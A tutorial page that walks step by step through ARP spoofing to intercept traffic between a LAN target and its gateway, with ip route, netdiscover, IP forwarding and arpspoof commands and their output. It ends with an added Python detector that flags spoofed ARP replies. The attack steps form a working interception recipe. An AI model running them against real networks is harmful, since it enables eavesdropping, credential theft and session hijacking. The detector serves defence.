ARP Spoofing

This technique creates a man-in-the-middle position, so that we can modify the communication in any way we want, or just listen to it with a sniffer to find usernames/passwords or hijack sessions.

1. First we have to find out the IP address of the router/gateway.

$ ip route
 
default via 192.168.2.1 dev eth0 proto dhcp metric 600
192.168.2.0/24 dev eth0 proto kernel scope link src 192.168.2.106 metric 600

2. Now we have to find out the IP address of our target.

$ netdiscover -r 192.168.2.0/24
 
Currently scanning: Finished!   |   Screen View: Unique Hosts               
                                                                              
5 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 228             
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname     
-----------------------------------------------------------------------------
192.168.2.1     9c:80:df:4f:df:e0      4     168  Arcadyan Technology Corporat
192.168.2.117   bc:5f:f4:83:b1:2e      1      60  ASRock Incorporation       

3. So that the target notices nothing, enable IP forwarding so the communication is passed on instead of dropped (this needs root).

$ echo 1 > /proc/sys/net/ipv4/ip_forward

4. Start the ARP spoofing to receive all the communication that happens between the two.

$ arpspoof -i eth0 -t 192.168.2.117 -r 192.168.2.1
 
78:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:44
78:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:44
78:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:44
78:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:44
...

Now we are sending unsolicited ARP replies non-stop to the router/gateway and to the target. We are telling the router/gateway that our MAC address is the target's new one, and telling the target that our MAC address is the router's new one. Because the replies never stop and the same MAC answers for two different IPs, this is also exactly what a defender's ARP monitor looks for.
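From the defender's side, the reply lines above are the signal to catch. The following is an added example, not part of the original page: it parses ARP reply lines in the format arpspoof prints above, compares them with the IP-to-MAC table gathered earlier with netdiscover (assumed here to be the trusted baseline), and alerts when an IP is claimed by a different MAC or when one MAC answers for several IPs. The benign sample line is constructed.

```python
import re
from collections import defaultdict

# Matches "<src-mac> <dst-mac> 0806 <len>: arp reply <ip> is-at <mac>".
ARP_REPLY = re.compile(
    r"^(?P<src>[0-9a-f:]+) (?P<dst>[0-9a-f:]+) 0806 \d+: arp reply "
    r"(?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]+)$",
    re.IGNORECASE,
)

# Trusted baseline taken from the netdiscover scan on this page.
KNOWN = {"192.168.2.1": "9c:80:df:4f:df:e0", "192.168.2.117": "bc:5f:f4:83:b1:2e"}

# Two reply lines from the page plus one constructed benign reply from the real gateway.
SAMPLE_LINES = [
    "78:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:44",
    "78:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:44",
    "78:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:44",
    "9c:80:df:4f:df:e0 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 9c:80:df:4f:df:e0",
]


def norm_mac(mac):
    # Zero-pad octets so "78:e4:0:93:ec:44" and "78:e4:00:93:ec:44" compare equal.
    return ":".join(o.zfill(2) for o in mac.lower().split(":"))


def detect_arp_spoof(lines, known):
    """Return unique alerts, in first-seen order, for replies that contradict
    the trusted IP->MAC table or for one MAC claiming several IPs."""
    known = {ip: norm_mac(m) for ip, m in known.items()}
    claims = defaultdict(set)  # mac -> IPs it has answered for
    alerts = []
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue  # not an ARP reply line; ignore
        ip, mac = m.group("ip"), norm_mac(m.group("mac"))
        claims[mac].add(ip)
        found = []
        if ip in known and known[ip] != mac:
            found.append(f"{ip} is-at {mac}, expected {known[ip]}")
        if len(claims[mac]) > 1:
            found.append(f"{mac} answers for multiple IPs: {', '.join(sorted(claims[mac]))}")
        alerts.extend(a for a in found if a not in alerts)
    return alerts


def analyze_sample():
    return detect_arp_spoof(SAMPLE_LINES, KNOWN)


if __name__ == "__main__":
    for alert in analyze_sample():
        print("ALERT:", alert)
```

On a live host the same check can be fed from `tcpdump -n -e arp` output, or run periodically against `ip neigh` to catch a changed gateway entry.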